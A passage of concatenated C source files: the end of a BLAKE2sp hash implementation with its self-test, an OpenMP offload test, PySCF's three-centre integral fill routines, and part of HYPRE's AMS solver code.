#pragma omp parallel shared(S,hash), num_threads(PARALLELISM_DEGREE)
#else
for( size_t id__ = 0; id__ < PARALLELISM_DEGREE; ++id__ )
#endif
{
#if defined(_OPENMP)
size_t id__ = omp_get_thread_num();
#endif
uint64_t inlen__ = inlen;
const uint8_t *in__ = ( const uint8_t * )in;
in__ += id__ * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S[id__], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
if( inlen__ > id__ * BLAKE2S_BLOCKBYTES )
{
const size_t left = inlen__ - id__ * BLAKE2S_BLOCKBYTES;
const size_t len = left <= BLAKE2S_BLOCKBYTES ? left : BLAKE2S_BLOCKBYTES;
blake2s_update( S[id__], in__, len );
}
blake2s_final( S[id__], hash[id__], BLAKE2S_OUTBYTES );
}
if( blake2sp_init_root( FS, outlen, keylen ) < 0 )
return -1;
FS->last_node = 1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( FS, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( FS, out, outlen );
}
#if defined(BLAKE2SP_SELFTEST)
#include <string.h>
#include "blake2-kat.h"
int main( int argc, char **argv )
{
uint8_t key[BLAKE2S_KEYBYTES];
uint8_t buf[KAT_LENGTH];
for( size_t i = 0; i < BLAKE2S_KEYBYTES; ++i )
key[i] = ( uint8_t )i;
for( size_t i = 0; i < KAT_LENGTH; ++i )
buf[i] = ( uint8_t )i;
for( size_t i = 0; i < KAT_LENGTH; ++i )
{
uint8_t hash[BLAKE2S_OUTBYTES];
blake2sp( hash, buf, key, BLAKE2S_OUTBYTES, i, BLAKE2S_KEYBYTES );
if( 0 != memcmp( hash, blake2sp_keyed_kat[i], BLAKE2S_OUTBYTES ) )
{
puts( "error" );
return -1;
}
}
puts( "ok" );
return 0;
}
#endif
|
host_targ.c | #include <stdio.h>
int arr[100];
int nt =12;
int main()
{
#pragma omp target teams distribute parallel for num_threads(nt)
for (int i=0; i<100;i++)
arr[i] =i;
//Verify
int errors = 0;
for (int i=0; i<100;i++){
if(arr[i] != i)
errors++;
}
if(!errors){
fprintf(stderr, "Success\n");
return 0;
} else{
fprintf(stderr, "Failed\nErrors: %d\n", errors);
return 1;
}
}
|
fill_r_3c.c | /* Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
* Author: Qiming Sun <osirpt.sun@gmail.com>
*/
#include <stdlib.h>
#include <stdio.h>
#include <complex.h>
#include "config.h"
#include "cint.h"
#include "gto/gto.h"
/*
* out[naoi,naoj,naok,comp] in F-order
*/
void GTOr3c_fill_s1(int (*intor)(), double complex *out, double complex *buf,
int comp, int ish, int jsh,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
const int ish0 = shls_slice[0];
const int ish1 = shls_slice[1];
const int jsh0 = shls_slice[2];
const int jsh1 = shls_slice[3];
const int ksh0 = shls_slice[4];
const int ksh1 = shls_slice[5];
const size_t naoi = ao_loc[ish1] - ao_loc[ish0];
const size_t naoj = ao_loc[jsh1] - ao_loc[jsh0];
const size_t naok = ao_loc[ksh1] - ao_loc[ksh0];
const size_t nij = naoi * naoj;
const int dims[] = {naoi, naoj, naok};
ish += ish0;
jsh += jsh0;
const int ip = ao_loc[ish] - ao_loc[ish0];
const int jp = ao_loc[jsh] - ao_loc[jsh0];
out += jp * naoi + ip;
int ksh, k0;
int shls[3];
shls[0] = ish;
shls[1] = jsh;
for (ksh = ksh0; ksh < ksh1; ksh++) {
shls[2] = ksh;
k0 = ao_loc[ksh ] - ao_loc[ksh0];
(*intor)(out+k0*nij, dims, shls, atm, natm, bas, nbas, env, cintopt, buf);
}
}
static void zcopy_s2_igtj(double complex *out, double complex *in, int comp,
int ip, int nij, int nijk, int di, int dj, int dk)
{
const size_t dij = di * dj;
const size_t ip1 = ip + 1;
int i, j, k, ic;
double complex *pout, *pin;
for (ic = 0; ic < comp; ic++) {
for (k = 0; k < dk; k++) {
pout = out + k * nij;
pin = in + k * dij;
for (i = 0; i < di; i++) {
for (j = 0; j < dj; j++) {
pout[j] = pin[j*di+i];
}
pout += ip1 + i;
}
}
out += nijk;
in += dij * dk;
}
}
static void zcopy_s2_ieqj(double complex *out, double complex *in, int comp,
int ip, int nij, int nijk, int di, int dj, int dk)
{
const size_t dij = di * dj;
const size_t ip1 = ip + 1;
int i, j, k, ic;
double complex *pout, *pin;
for (ic = 0; ic < comp; ic++) {
for (k = 0; k < dk; k++) {
pout = out + k * nij;
pin = in + k * dij;
for (i = 0; i < di; i++) {
for (j = 0; j <= i; j++) {
pout[j] = pin[j*di+i];
}
pout += ip1 + i;
}
}
out += nijk;
in += dij * dk;
}
}
/*
* out[comp,naok,nij] in C-order
* nij = i1*(i1+1)/2 - i0*(i0+1)/2
* [ \ ]
* [**** ]
* [***** ]
* [*****. ] <= . may not be filled, if jsh-upper-bound < ish-upper-bound
* [ \]
*/
void GTOr3c_fill_s2ij(int (*intor)(), double complex *out, double complex *buf,
int comp, int ish, int jsh,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
const int ish0 = shls_slice[0];
const int ish1 = shls_slice[1];
const int jsh0 = shls_slice[2];
ish += ish0;
jsh += jsh0;
const int ip = ao_loc[ish];
const int jp = ao_loc[jsh] - ao_loc[jsh0];
if (ip < jp) {
return;
}
const int ksh0 = shls_slice[4];
const int ksh1 = shls_slice[5];
const int i0 = ao_loc[ish0];
const int i1 = ao_loc[ish1];
const size_t naok = ao_loc[ksh1] - ao_loc[ksh0];
const size_t off = i0 * (i0 + 1) / 2;
const size_t nij = i1 * (i1 + 1) / 2 - off;
const size_t nijk = nij * naok;
const int di = ao_loc[ish+1] - ao_loc[ish];
const int dj = ao_loc[jsh+1] - ao_loc[jsh];
out += ip * (ip + 1) / 2 - off + jp;
int ksh, dk, k0;
int shls[3];
dk = GTOmax_shell_dim(ao_loc, shls_slice, 3);
double *cache = (double *)(buf + di * dj * dk * comp);
shls[0] = ish;
shls[1] = jsh;
for (ksh = ksh0; ksh < ksh1; ksh++) {
shls[2] = ksh;
dk = ao_loc[ksh+1] - ao_loc[ksh];
k0 = ao_loc[ksh ] - ao_loc[ksh0];
(*intor)(buf, NULL, shls, atm, natm, bas, nbas, env, cintopt, cache);
if (ip != jp) {
zcopy_s2_igtj(out+k0*nij, buf, comp, ip, nij, nijk, di, dj, dk);
} else {
zcopy_s2_ieqj(out+k0*nij, buf, comp, ip, nij, nijk, di, dj, dk);
}
}
}
void GTOr3c_fill_s2jk(int (*intor)(), double complex *out, double complex *buf,
int comp, int ish, int jsh,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
fprintf(stderr, "GTOr3c_fill_s2jk not implemented\n");
exit(1);
}
void GTOr3c_drv(int (*intor)(), void (*fill)(), double complex *eri, int comp,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
const int ish0 = shls_slice[0];
const int ish1 = shls_slice[1];
const int jsh0 = shls_slice[2];
const int jsh1 = shls_slice[3];
const int nish = ish1 - ish0;
const int njsh = jsh1 - jsh0;
const int di = GTOmax_shell_dim(ao_loc, shls_slice, 3);
const int cache_size = GTOmax_cache_size(intor, shls_slice, 3,
atm, natm, bas, nbas, env);
#pragma omp parallel
{
int ish, jsh, ij;
double complex *buf = malloc(sizeof(double complex) *
(di*di*di*comp + cache_size/2));
#pragma omp for schedule(dynamic)
for (ij = 0; ij < nish*njsh; ij++) {
ish = ij / njsh;
jsh = ij % njsh;
(*fill)(intor, eri, buf, comp, ish, jsh, shls_slice, ao_loc,
cintopt, atm, natm, bas, nbas, env);
}
free(buf);
}
}
|
ams.c | /******************************************************************************
* Copyright 1998-2019 Lawrence Livermore National Security, LLC and other
* HYPRE Project Developers. See the top-level COPYRIGHT file for details.
*
* SPDX-License-Identifier: (Apache-2.0 OR MIT)
******************************************************************************/
#include "_hypre_parcsr_ls.h"
#include "float.h"
#include "ams.h"
#include "_hypre_utilities.hpp"
/*--------------------------------------------------------------------------
* hypre_ParCSRRelax
*
* Relaxation on the ParCSR matrix A with right-hand side f and
* initial guess u. Possible values for relax_type are:
*
* 1 = l1-scaled (or weighted) Jacobi
* 2 = l1-scaled block Gauss-Seidel/SSOR
* 3 = Kaczmarz
* 4 = truncated version of 2 (Remark 6.2 in smoothers paper)
* x = BoomerAMG relaxation with relax_type = |x|
* (16 = Cheby)
*
* The default value of relax_type is 2.
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_ParCSRRelax( hypre_ParCSRMatrix *A, /* matrix to relax with */
hypre_ParVector *f, /* right-hand side */
HYPRE_Int relax_type, /* relaxation type */
HYPRE_Int relax_times, /* number of sweeps */
HYPRE_Real *l1_norms, /* l1 norms of the rows of A */
HYPRE_Real relax_weight, /* damping coefficient (usually <= 1) */
HYPRE_Real omega, /* SOR parameter (usually in (0,2) */
HYPRE_Real max_eig_est, /* for cheby smoothers */
HYPRE_Real min_eig_est,
HYPRE_Int cheby_order,
HYPRE_Real cheby_fraction,
hypre_ParVector *u, /* initial/updated approximation */
hypre_ParVector *v, /* temporary vector */
hypre_ParVector *z /* temporary vector */ )
{
HYPRE_Int sweep;
for (sweep = 0; sweep < relax_times; sweep++)
{
if (relax_type == 1) /* l1-scaled Jacobi */
{
hypre_BoomerAMGRelax(A, f, NULL, 7, 0, relax_weight, 1.0, l1_norms, u, v, z);
}
else if (relax_type == 2 || relax_type == 4) /* offd-l1-scaled block GS */
{
#if 0
if (relax_weight == 1.0 && omega == 1.0) /* symmetric Gauss-Seidel */
{
hypre_BoomerAMGRelaxHybridGaussSeidel_core(A, f, NULL, 0, 1.0, 1.0, l1_norms, u, v, z,
1, 1 /* symm */, 0 /* skip diag */, 1, 0);
}
else if (relax_weight == 1.0) /* SSOR */
{
hypre_BoomerAMGRelaxHybridGaussSeidel_core(A, f, NULL, 0, omega, 1.0, l1_norms, u, v, z,
1, 1 /* symm */, 0 /* skip diag */, 1, 0);
}
else /* scaled SSOR */
{
#endif
/* !!! relax_weight and omega flipped !!! */
hypre_BoomerAMGRelaxHybridGaussSeidel_core(A, f, NULL, 0, omega, relax_weight, l1_norms, u, v, z,
1, 1 /* symm */, 0 /* skip diag */, 1, 0);
#if 0
}
#endif
}
else if (relax_type == 3) /* Kaczmarz */
{
hypre_BoomerAMGRelax(A, f, NULL, 20, 0, relax_weight, omega, l1_norms, u, v, z);
}
else /* call BoomerAMG relaxation */
{
if (relax_type == 16)
{
hypre_ParCSRRelax_Cheby(A, f, max_eig_est, min_eig_est, cheby_fraction, cheby_order, 1,
0, u, v, z);
}
else
{
hypre_BoomerAMGRelax(A, f, NULL, hypre_abs(relax_type), 0, relax_weight,
omega, l1_norms, u, v, z);
}
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorInRangeOf
*
* Return a vector that belongs to the range of a given matrix.
*--------------------------------------------------------------------------*/
hypre_ParVector *hypre_ParVectorInRangeOf(hypre_ParCSRMatrix *A)
{
hypre_ParVector *x;
x = hypre_ParVectorCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumRows(A),
hypre_ParCSRMatrixRowStarts(A));
hypre_ParVectorInitialize(x);
hypre_ParVectorOwnsData(x) = 1;
hypre_ParVectorOwnsPartitioning(x) = 0;
return x;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorInDomainOf
*
* Return a vector that belongs to the domain of a given matrix.
*--------------------------------------------------------------------------*/
hypre_ParVector *hypre_ParVectorInDomainOf(hypre_ParCSRMatrix *A)
{
hypre_ParVector *x;
x = hypre_ParVectorCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumCols(A),
hypre_ParCSRMatrixColStarts(A));
hypre_ParVectorInitialize(x);
hypre_ParVectorOwnsData(x) = 1;
hypre_ParVectorOwnsPartitioning(x) = 0;
return x;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorBlockSplit
*
* Extract the dim sub-vectors x_0,...,x_{dim-1} composing a parallel
* block vector x. It is assumed that &x[i] = [x_0[i],...,x_{dim-1}[i]].
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParVectorBlockSplit(hypre_ParVector *x,
hypre_ParVector *x_[3],
HYPRE_Int dim)
{
HYPRE_Int i, d, size_;
HYPRE_Real *x_data, *x_data_[3];
size_ = hypre_VectorSize(hypre_ParVectorLocalVector(x_[0]));
x_data = hypre_VectorData(hypre_ParVectorLocalVector(x));
for (d = 0; d < dim; d++)
x_data_[d] = hypre_VectorData(hypre_ParVectorLocalVector(x_[d]));
for (i = 0; i < size_; i++)
for (d = 0; d < dim; d++)
x_data_[d][i] = x_data[dim*i+d];
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorBlockGather
*
* Compose a parallel block vector x from dim given sub-vectors
* x_0,...,x_{dim-1}, such that &x[i] = [x_0[i],...,x_{dim-1}[i]].
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParVectorBlockGather(hypre_ParVector *x,
hypre_ParVector *x_[3],
HYPRE_Int dim)
{
HYPRE_Int i, d, size_;
HYPRE_Real *x_data, *x_data_[3];
size_ = hypre_VectorSize(hypre_ParVectorLocalVector(x_[0]));
x_data = hypre_VectorData(hypre_ParVectorLocalVector(x));
for (d = 0; d < dim; d++)
x_data_[d] = hypre_VectorData(hypre_ParVectorLocalVector(x_[d]));
for (i = 0; i < size_; i++)
for (d = 0; d < dim; d++)
x_data[dim*i+d] = x_data_[d][i];
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_BoomerAMGBlockSolve
*
* Apply the block-diagonal solver diag(B) to the system diag(A) x = b.
* Here B is a given BoomerAMG solver for A, while x and b are "block"
* parallel vectors.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_BoomerAMGBlockSolve(void *B,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x)
{
HYPRE_Int d, dim = 1;
hypre_ParVector *b_[3];
hypre_ParVector *x_[3];
dim = hypre_ParVectorGlobalSize(x) / hypre_ParCSRMatrixGlobalNumRows(A);
if (dim == 1)
{
hypre_BoomerAMGSolve(B, A, b, x);
return hypre_error_flag;
}
for (d = 0; d < dim; d++)
{
b_[d] = hypre_ParVectorInRangeOf(A);
x_[d] = hypre_ParVectorInRangeOf(A);
}
hypre_ParVectorBlockSplit(b, b_, dim);
hypre_ParVectorBlockSplit(x, x_, dim);
for (d = 0; d < dim; d++)
hypre_BoomerAMGSolve(B, A, b_[d], x_[d]);
hypre_ParVectorBlockGather(x, x_, dim);
for (d = 0; d < dim; d++)
{
hypre_ParVectorDestroy(b_[d]);
hypre_ParVectorDestroy(x_[d]);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRMatrixFixZeroRows
*
* For every zero row in the matrix: set the diagonal element to 1.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRMatrixFixZeroRows(hypre_ParCSRMatrix *A)
{
HYPRE_Int i, j;
HYPRE_Real l1_norm;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Int *A_diag_I = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_J = hypre_CSRMatrixJ(A_diag);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_I = hypre_CSRMatrixI(A_offd);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
/* a row will be considered zero if its l1 norm is less than eps */
HYPRE_Real eps = 0.0; /* DBL_EPSILON * 1e+4; */
for (i = 0; i < num_rows; i++)
{
l1_norm = 0.0;
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
l1_norm += fabs(A_diag_data[j]);
if (num_cols_offd)
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm += fabs(A_offd_data[j]);
if (l1_norm <= eps)
{
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
if (A_diag_J[j] == i)
A_diag_data[j] = 1.0;
else
A_diag_data[j] = 0.0;
if (num_cols_offd)
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
A_offd_data[j] = 0.0;
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRComputeL1Norms
*
* Compute the l1 norms of the rows of a given matrix, depending on
* the option parameter:
*
* option 1 = Compute the l1 norm of the rows
* option 2 = Compute the l1 norm of the (processor) off-diagonal
* part of the rows plus the diagonal of A
* option 3 = Compute the l2 norm^2 of the rows
* option 4 = Truncated version of option 2 based on Remark 6.2 in "Multigrid
* Smoothers for Ultra-Parallel Computing"
*
* The above computations are done in a CF manner, whenever the provided
* cf_marker is not NULL.
*--------------------------------------------------------------------------*/
#if defined(HYPRE_USING_CUDA)
struct l1_norm_op1 : public thrust::binary_function<HYPRE_Complex, HYPRE_Complex, HYPRE_Complex>
{
__host__ __device__
HYPRE_Complex operator()(HYPRE_Complex &x, HYPRE_Complex &y) const
{
return x <= 4.0/3.0 * y ? y : x;
}
};
#endif
HYPRE_Int hypre_ParCSRComputeL1Norms(hypre_ParCSRMatrix *A,
HYPRE_Int option,
HYPRE_Int *cf_marker,
HYPRE_Real **l1_norm_ptr)
{
HYPRE_Int i, j;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_MemoryLocation memory_location_l1 = hypre_ParCSRMatrixMemoryLocation(A);
HYPRE_ExecutionPolicy exec = hypre_GetExecPolicy1( memory_location_l1 );
if (exec == HYPRE_EXEC_HOST)
{
HYPRE_Int num_threads = hypre_NumThreads();
if (num_threads > 1)
{
return hypre_ParCSRComputeL1NormsThreads(A, option, num_threads, cf_marker, l1_norm_ptr);
}
}
HYPRE_Real *l1_norm = hypre_TAlloc(HYPRE_Real, num_rows, memory_location_l1);
HYPRE_MemoryLocation memory_location_tmp = exec == HYPRE_EXEC_HOST ? HYPRE_MEMORY_HOST : HYPRE_MEMORY_DEVICE;
HYPRE_Real *diag_tmp = NULL;
HYPRE_Int *cf_marker_offd = NULL, *cf_marker_dev = NULL;
/* collect the cf marker data from other procs */
if (cf_marker != NULL)
{
HYPRE_Int index;
HYPRE_Int num_sends;
HYPRE_Int start;
HYPRE_Int *int_buf_data = NULL;
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
hypre_ParCSRCommHandle *comm_handle;
if (num_cols_offd)
{
cf_marker_offd = hypre_CTAlloc(HYPRE_Int, num_cols_offd, memory_location_tmp);
}
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
if (hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends))
{
int_buf_data = hypre_CTAlloc(HYPRE_Int, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends),
HYPRE_MEMORY_HOST);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j = start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1); j++)
{
int_buf_data[index++] = cf_marker[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate_v2(11, comm_pkg, HYPRE_MEMORY_HOST, int_buf_data,
memory_location_tmp, cf_marker_offd);
hypre_ParCSRCommHandleDestroy(comm_handle);
hypre_TFree(int_buf_data, HYPRE_MEMORY_HOST);
if (exec == HYPRE_EXEC_DEVICE)
{
cf_marker_dev = hypre_TAlloc(HYPRE_Int, num_rows, HYPRE_MEMORY_DEVICE);
hypre_TMemcpy(cf_marker_dev, cf_marker, HYPRE_Int, num_rows, HYPRE_MEMORY_DEVICE, HYPRE_MEMORY_HOST);
}
else
{
cf_marker_dev = cf_marker;
}
}
if (option == 1)
{
/* Set the l1 norm of the diag part */
hypre_CSRMatrixComputeRowSum(A_diag, cf_marker_dev, cf_marker_dev, l1_norm, 1, 1.0, "set");
/* Add the l1 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, cf_marker_dev, cf_marker_offd, l1_norm, 1, 1.0, "add");
}
}
else if (option == 2)
{
/* Set the abs(diag) element */
hypre_CSRMatrixExtractDiagonal(A_diag, l1_norm, 1);
/* Add the l1 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, cf_marker_dev, cf_marker_offd, l1_norm, 1, 1.0, "add");
}
}
else if (option == 3)
{
/* Set the CF l2 norm of the diag part */
hypre_CSRMatrixComputeRowSum(A_diag, NULL, NULL, l1_norm, 2, 1.0, "set");
/* Add the CF l2 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, NULL, NULL, l1_norm, 2, 1.0, "add");
}
}
else if (option == 4)
{
/* Set the abs(diag) element */
hypre_CSRMatrixExtractDiagonal(A_diag, l1_norm, 1);
diag_tmp = hypre_TAlloc(HYPRE_Real, num_rows, memory_location_tmp);
hypre_TMemcpy(diag_tmp, l1_norm, HYPRE_Real, num_rows, memory_location_tmp, memory_location_l1);
/* Add the scaled l1 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, cf_marker_dev, cf_marker_offd, l1_norm, 1, 0.5, "add");
}
/* Truncate according to Remark 6.2 */
#if defined(HYPRE_USING_CUDA)
if (exec == HYPRE_EXEC_DEVICE)
{
HYPRE_THRUST_CALL( transform, l1_norm, l1_norm + num_rows, diag_tmp, l1_norm, l1_norm_op1() );
}
else
#endif
{
for (i = 0; i < num_rows; i++)
{
if (l1_norm[i] <= 4.0/3.0 * diag_tmp[i])
{
l1_norm[i] = diag_tmp[i];
}
}
}
}
else if (option == 5) /*stores diagonal of A for Jacobi using matvec, rlx 7 */
{
/* Set the diag element */
hypre_CSRMatrixExtractDiagonal(A_diag, l1_norm, 0);
#if defined(HYPRE_USING_CUDA)
if ( exec == HYPRE_EXEC_DEVICE)
{
thrust::identity<HYPRE_Complex> identity;
HYPRE_THRUST_CALL( replace_if, l1_norm, l1_norm + num_rows, thrust::not1(identity), 1.0 );
}
else
#endif
{
for (i = 0; i < num_rows; i++)
{
if (l1_norm[i] == 0.0)
{
l1_norm[i] = 1.0;
}
}
}
*l1_norm_ptr = l1_norm;
return hypre_error_flag;
}
/* Handle negative definite matrices */
if (!diag_tmp)
{
diag_tmp = hypre_TAlloc(HYPRE_Real, num_rows, memory_location_tmp);
}
/* Set the diag element */
hypre_CSRMatrixExtractDiagonal(A_diag, diag_tmp, 0);
#if defined(HYPRE_USING_CUDA)
if (exec == HYPRE_EXEC_DEVICE)
{
HYPRE_THRUST_CALL( transform_if, l1_norm, l1_norm + num_rows, diag_tmp, l1_norm, thrust::negate<HYPRE_Real>(),
is_negative<HYPRE_Real>() );
//bool any_zero = HYPRE_THRUST_CALL( any_of, l1_norm, l1_norm + num_rows, thrust::not1(thrust::identity<HYPRE_Complex>()) );
bool any_zero = 0.0 == HYPRE_THRUST_CALL( reduce, l1_norm, l1_norm + num_rows, 1.0, thrust::minimum<HYPRE_Real>() );
if ( any_zero )
{
hypre_error_in_arg(1);
}
}
else
#endif
{
for (i = 0; i < num_rows; i++)
{
if (diag_tmp[i] < 0.0)
{
l1_norm[i] = -l1_norm[i];
}
}
for (i = 0; i < num_rows; i++)
{
/* if (fabs(l1_norm[i]) < DBL_EPSILON) */
if (fabs(l1_norm[i]) == 0.0)
{
hypre_error_in_arg(1);
break;
}
}
}
if (exec == HYPRE_EXEC_DEVICE)
{
hypre_TFree(cf_marker_dev, HYPRE_MEMORY_DEVICE);
}
hypre_TFree(cf_marker_offd, memory_location_tmp);
hypre_TFree(diag_tmp, memory_location_tmp);
*l1_norm_ptr = l1_norm;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRMatrixSetDiagRows
*
* For every row containing only a diagonal element: set it to d.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRMatrixSetDiagRows(hypre_ParCSRMatrix *A, HYPRE_Real d)
{
HYPRE_Int i, j;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Int *A_diag_I = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_J = hypre_CSRMatrixJ(A_diag);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_I = hypre_CSRMatrixI(A_offd);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
for (i = 0; i < num_rows; i++)
{
j = A_diag_I[i];
if ((A_diag_I[i+1] == j+1) && (A_diag_J[j] == i) &&
(!num_cols_offd || (A_offd_I[i+1] == A_offd_I[i])))
{
A_diag_data[j] = d;
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSCreate
*
* Allocate the AMS solver structure.
*--------------------------------------------------------------------------*/
void * hypre_AMSCreate()
{
hypre_AMSData *ams_data;
ams_data = hypre_CTAlloc(hypre_AMSData, 1, HYPRE_MEMORY_HOST);
/* Default parameters */
ams_data -> dim = 3; /* 3D problem */
ams_data -> maxit = 20; /* perform at most 20 iterations */
ams_data -> tol = 1e-6; /* convergence tolerance */
ams_data -> print_level = 1; /* print residual norm at each step */
ams_data -> cycle_type = 1; /* a 3-level multiplicative solver */
ams_data -> A_relax_type = 2; /* offd-l1-scaled GS */
ams_data -> A_relax_times = 1; /* one relaxation sweep */
ams_data -> A_relax_weight = 1.0; /* damping parameter */
ams_data -> A_omega = 1.0; /* SSOR coefficient */
ams_data -> A_cheby_order = 2; /* Cheby: order (1 -4 are vaild) */
ams_data -> A_cheby_fraction = .3; /* Cheby: fraction of spectrum to smooth */
ams_data -> B_G_coarsen_type = 10; /* HMIS coarsening */
ams_data -> B_G_agg_levels = 1; /* Levels of aggressive coarsening */
ams_data -> B_G_relax_type = 3; /* hybrid G-S/Jacobi */
ams_data -> B_G_theta = 0.25; /* strength threshold */
ams_data -> B_G_interp_type = 0; /* interpolation type */
ams_data -> B_G_Pmax = 0; /* max nonzero elements in interp. rows */
ams_data -> B_Pi_coarsen_type = 10; /* HMIS coarsening */
ams_data -> B_Pi_agg_levels = 1; /* Levels of aggressive coarsening */
ams_data -> B_Pi_relax_type = 3; /* hybrid G-S/Jacobi */
ams_data -> B_Pi_theta = 0.25; /* strength threshold */
ams_data -> B_Pi_interp_type = 0; /* interpolation type */
ams_data -> B_Pi_Pmax = 0; /* max nonzero elements in interp. rows */
ams_data -> beta_is_zero = 0; /* the problem has a mass term */
/* By default, do l1-GS smoothing on the coarsest grid */
ams_data -> B_G_coarse_relax_type = 8;
ams_data -> B_Pi_coarse_relax_type = 8;
/* The rest of the fields are initialized using the Set functions */
ams_data -> A = NULL;
ams_data -> G = NULL;
ams_data -> A_G = NULL;
ams_data -> B_G = 0;
ams_data -> Pi = NULL;
ams_data -> A_Pi = NULL;
ams_data -> B_Pi = 0;
ams_data -> x = NULL;
ams_data -> y = NULL;
ams_data -> z = NULL;
ams_data -> Gx = NULL;
ams_data -> Gy = NULL;
ams_data -> Gz = NULL;
ams_data -> r0 = NULL;
ams_data -> g0 = NULL;
ams_data -> r1 = NULL;
ams_data -> g1 = NULL;
ams_data -> r2 = NULL;
ams_data -> g2 = NULL;
ams_data -> Pix = NULL;
ams_data -> Piy = NULL;
ams_data -> Piz = NULL;
ams_data -> A_Pix = NULL;
ams_data -> A_Piy = NULL;
ams_data -> A_Piz = NULL;
ams_data -> B_Pix = 0;
ams_data -> B_Piy = 0;
ams_data -> B_Piz = 0;
ams_data -> interior_nodes = NULL;
ams_data -> G0 = NULL;
ams_data -> A_G0 = NULL;
ams_data -> B_G0 = 0;
ams_data -> projection_frequency = 5;
ams_data -> A_l1_norms = NULL;
ams_data -> A_max_eig_est = 0;
ams_data -> A_min_eig_est = 0;
ams_data -> owns_Pi = 1;
ams_data -> owns_A_G = 0;
ams_data -> owns_A_Pi = 0;
return (void *) ams_data;
}
/*--------------------------------------------------------------------------
* hypre_AMSDestroy
*
* Deallocate the AMS solver structure. Note that the input data (given
* through the Set functions) is not destroyed.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSDestroy(void *solver)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (!ams_data)
{
hypre_error_in_arg(1);
return hypre_error_flag;
}
if (ams_data -> owns_A_G)
if (ams_data -> A_G)
hypre_ParCSRMatrixDestroy(ams_data -> A_G);
if (!ams_data -> beta_is_zero)
if (ams_data -> B_G)
